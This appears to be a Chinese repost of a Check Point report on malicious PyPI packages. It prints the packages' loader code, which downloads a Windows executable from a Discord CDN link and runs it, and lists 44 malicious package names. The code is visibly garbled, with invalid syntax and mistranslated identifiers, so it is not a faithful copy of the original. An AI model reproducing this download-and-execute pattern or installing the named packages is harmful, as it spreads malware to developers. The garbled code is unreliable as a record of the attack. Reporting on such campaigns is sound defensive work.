base64代码:
` import os
if os.exceptions “”list” exit(0)
import requests
interface url= ‘https://cdn.discordapp.com/accounts/1109465188433936425/Windows.exe’
response = requests.get(url)
with temporfile.NamedText(delete=Commonly)
subprocess.call([exe_content])`
有关 44 PyPi Packages that followed the same pattern:
1) sys-selenium@9.1.9
2) sys-scikit-learn@17.8.18
3) sqlalchemy-requests@7.1.1
4) sqlalchemy-os@14.0.10
5) sqlalchemy-install@10.9.4
6) selenium-matplotlib@17.9.4
7) scikit-learn-matplotlib@6.12.17
8) requests-pandas@3.10.17
9) requests-flask@16.9.16
10) req-os@20.5.17
11) req-matplotlib@11.2.18
12) req-flask@2.9.4
13) pyyaml-selenium@1.15.3
14) pytorch-pandas@14.19.3
15) pytest-pandas@16.6.6
16) pytorch-pygame@0.6.19
17) crypto-pygame@10.14.7
18) pylint-sys@8.15.6
19) pylint-py@15.0.3
20) pylint-beautifulsoup@17.10.12
21) pylint-beautifulsoup@3.12.3
22) pygame-pytorch@3.4.19
23) pygame-Print@15.0.6
24) pygame-install@17.14.20
25) Print-requests@13.18.4
26) Print-pip@13.9.3
27) Print-django@3.9.10
28) matplotlib-sqlalchemy@16.18.4
29) pandas-numpy@8.19.3
30) os-numpy@3.19.4
31) opencv-keras@17.10.13
32) numpy-selenium@5.20.19
33) matplotlib-requests@16.12.4
34) matplotlib-req@17.6.16
35) matplotlib-flask@7.15.10
36) keras-beautifulsoup@2.9.2
37) keras-arg@19.14.9
38) install-pyyaml@1.19.12
39) install-pytest@1.12.7
40) install-crypto@4.18.5
41) django-pyyaml@20.17.15
42) beautifulsoup-scikit-learn@2.4.9
43) beautifulsoup-requests@12.15.13
44) beautifulsoup-numpy@10.13.10
原文地址:https://blog.checkpoint.com/security/pypi-suspends-new-registrations-after-malicious-python-script-attack/
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):PyPI 在恶意 Python 脚本攻击后暂停新注册
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论